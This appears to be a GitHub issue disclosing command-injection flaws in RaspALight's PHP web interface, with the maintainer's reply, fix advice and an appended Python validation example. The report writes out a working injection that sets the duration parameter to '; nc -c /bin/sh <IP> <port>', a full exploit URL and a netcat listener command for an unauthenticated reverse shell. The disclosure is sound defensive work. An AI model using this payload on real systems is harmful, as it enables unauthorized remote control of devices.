RaspALight
Remote Command Execution Flaws
Hi,
I found two security flaws which allow attackers in the same network to perform remote commands over the web interface. For example, in line
https://github.com/eweren/RaspALight/blob/master/ledcontrol/index.php#L30
an attacker could open a shell through netcat with the duration-GET-parameter set to ; nc -c /bin/sh <your IP> <any unfiltered port>.
Think about a scenario where the RaspALight runs on 10.1.1.7 and the attacker's IP is 10.1.1.1. When you run nc -l -p 1337 -vvv
on the attacker's machine and open the url http://10.1.1.7/ledcontrol/index.php?time=1309&date=20170401&duration=; nc -c /bin/sh 10.1.1.1 1337, you get a remote shell without authenticating yourself.
The same works in the following line with the abort-GET-parameter:
https://github.com/eweren/RaspALight/blob/master/ledcontrol/index.php#L40
Thanks for the information. Haven't thought of that scenario. So if I would handle the alarms with some python scripts on the pi itself and would edit the alarms over the web interface not by executing the script but by saving the relevant alarm information (like date, time and in the future repeating interval) from the forms to a file and let the python script read those files, would there still be that flaw?
This would be the easiest way to prevent this flaw. Remember to sanitize every user input to be sure that an attacker has no chance to exploit the input fields. The cleanest way would be a management server for the alarms that spawns alarm threads at different times and saves the alarm details in a database. The solution with the database is more advanced and efficient, but there's also more space to create new flaws (e.g. SQL injections).
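The file-based design discussed above, as an added example that is not RaspALight's own code: the form fields are allow-listed into a typed record and appended to a file for the Python alarm script to read, so request data never reaches a shell. The parameter names time, date and duration are taken from the URL in the report; the HHMM/YYYYMMDD formats and the 1440-minute limit are assumptions.

```python
import json
import re
from datetime import datetime

# Constructed example (not the project's code): validate the alarm form
# strictly and persist it as data. No subprocess is spawned from request
# input, so a trailing "; <command>" in a field is simply rejected.

_TIME_RE = re.compile(r"^([01][0-9]|2[0-3])[0-5][0-9]$")  # HHMM, e.g. "1309"
_DATE_RE = re.compile(r"^[0-9]{8}$")                      # YYYYMMDD, e.g. "20170401"
_DURATION_RE = re.compile(r"^[0-9]{1,4}$")                # whole minutes only
MAX_DURATION_MIN = 24 * 60                                # assumed upper bound


class InvalidAlarm(ValueError):
    """Raised when a form field does not match the allow-list."""


def parse_alarm(params):
    """Return a plain dict for valid time/date/duration fields, else raise."""
    time_s = str(params.get("time", ""))
    date_s = str(params.get("date", ""))
    dur_s = str(params.get("duration", ""))
    if not _TIME_RE.match(time_s):
        raise InvalidAlarm("time must be HHMM")
    if not _DATE_RE.match(date_s):
        raise InvalidAlarm("date must be YYYYMMDD")
    try:
        datetime.strptime(date_s, "%Y%m%d")  # rejects e.g. 20170231
    except ValueError:
        raise InvalidAlarm("date is not a calendar date") from None
    if not _DURATION_RE.match(dur_s) or not 0 < int(dur_s) <= MAX_DURATION_MIN:
        raise InvalidAlarm("duration must be 1..1440 minutes")
    return {"time": time_s, "date": date_s, "duration": int(dur_s)}


def is_valid(params):
    """Convenience check used by the web layer before accepting a form."""
    try:
        parse_alarm(params)
        return True
    except InvalidAlarm:
        return False


def save_alarm(params, path):
    """Validate, then append one JSON line; the alarm daemon reads this file."""
    alarm = parse_alarm(params)
    with open(path, "a", encoding="utf-8") as fh:
        fh.write(json.dumps(alarm) + "\n")
    return alarm
```

The daemon side only ever parses JSON records and computes times from them, so the only way to influence it is through values that already passed the allow-list.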